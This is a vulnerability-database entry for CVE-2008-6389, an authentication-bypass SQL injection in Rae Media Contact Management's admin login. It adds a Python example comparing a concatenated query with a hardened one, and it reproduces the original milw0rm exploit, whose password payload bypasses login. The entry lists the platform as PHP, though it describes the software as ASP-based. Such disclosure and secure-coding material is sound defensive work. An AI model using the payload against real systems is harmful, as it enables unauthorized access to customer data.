Aliensoftcorp Rae Media Web Based Contact Management 'asadmin/default.asp' SQL Injection Vulnerability

Vulnerability ID: 1116920
Vulnerability type: SQL injection
Published: 2008-12-03
Updated: 2009-03-03
CVE ID: CVE-2008-6389
CNNVD-ID: CNNVD-200903-043
Platform: PHP
CVSS score: 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/7333
https://cxsecurity.com/issue/WLB-2009030114
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-043
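|Vulnerability details
Rae Media Contact Management is a customer contact management system based on ASP and SQL Server. A SQL injection vulnerability exists in asadmin/default.asp in the SOHO, Standard, and Enterprise versions of Rae Media Contact Management Software. Remote attackers can execute arbitrary SQL commands via the password parameter.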
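
Added example (not part of the original entry and not the vendor's code): a login check that builds its SQL by string concatenation, next to a hardened version, run against the password value listed in the advisory on this page. The application's source is not shown here, so the table layout, column names and function names are assumptions, and Python with sqlite3 stands in for ASP with SQL Server.

```python
import hashlib
import hmac
import os
import sqlite3

def derive(password, salt):
    # Salted, slow hash so the database never needs the plaintext password.
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, 100_000)

def make_db():
    """Constructed in-memory admin table; the real schema is not on the page."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admins (username TEXT PRIMARY KEY, "
               "password TEXT, salt BLOB, pw_hash BLOB)")
    salt = os.urandom(16)
    # 'password' (plaintext) exists only to mirror the legacy query shape below.
    db.execute("INSERT INTO admins VALUES (?, ?, ?, ?)",
               ("admin", "S3cret-constructed", salt,
                derive("S3cret-constructed", salt)))
    return db

def login_concatenated(db, user, password):
    # Vulnerable pattern: user input becomes part of the SQL text, so a quote
    # in the password closes the string literal and the remainder is parsed
    # as SQL. AND binds tighter than OR, so a trailing always-true OR term
    # makes the WHERE clause match every row.
    sql = ("SELECT COUNT(*) FROM admins WHERE username = '" + user +
           "' AND password = '" + password + "'")
    return db.execute(sql).fetchone()[0] > 0

def login_hardened(db, user, password):
    # Fix 1: bound parameter, so input is always data and never SQL syntax.
    row = db.execute("SELECT salt, pw_hash FROM admins WHERE username = ?",
                     (user,)).fetchone()
    if row is None:
        return False
    # Fix 2: the password is verified in application code against a salted
    # hash, in constant time, and never takes part in the query at all.
    return hmac.compare_digest(derive(password, row[0]), row[1])

if __name__ == "__main__":
    db = make_db()
    advisory_value = "delta' or 'a'='a"  # password value quoted on this page
    print("concatenated:", login_concatenated(db, "anything", advisory_value))
    print("hardened:    ", login_hardened(db, "anything", advisory_value))
    print("valid login: ", login_hardened(db, "admin", "S3cret-constructed"))
```
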
|Exploit
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
        +                                                                         +
        + Web Based Contact Management (Auth Bypass) SQL Injection Vulnerability  +
        +                                                                         +
        +                        Discovered by b3hz4d                             +
        +                                                                         +
        +                        WwW.DeltaHacking.Net                             +
        +                                                                         +
        +                                                                         +
        +                                                                         +
        +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
                                  

                              APA Center of Yazd University   
                                 (https://www.ircert.cc)    

		
AUTHOR : b3hz4d (Seyed Behzad Shaghasemi)
DATE   : 03 Dec 2008
SITE   : WwW.DeltaHacking.Net
CONTACT: behzad_sh_66@yahoo.com

#####################################################

APPLICATION   : Web Based Contact Management
DOWNLOAD(199$): http://www.aliensoftcorp.com/contactmanager.htm
VENDOR        : http://www.aliensoftcorp.com/
DEMO          : http://www.aliensoftcorp.com/contactmanager.htm

#####################################################


[+] vuln    : 
              
              Admin login page
              
              All versions (SOHO Version, Standard Version, Enterprise Version) are vulnerable.
              
              All Demo links are here:
              
              http://www.aliensoftcorp.com/contactmanager.htm	  

[+] Exploit : 
              USER: anything

	      PASS: delta' or 'a'='a
 
                
##########################################################################################################

# Greetings: str0ke, Dr.Trojan, Cru3l.b0y, l0pht and all member in DeltaHacking.Net & Snoop-Security.Com #

##########################################################################################################

# milw0rm.com [2008-12-03]
|References

Source: BID
Name: 32616
Link: http://www.securityfocus.com/bid/32616
Source: MILW0RM
Name: 7333
Link: http://www.milw0rm.com/exploits/7333
Source: SECUNIA
Name: 32988
Link: http://secunia.com/advisories/32988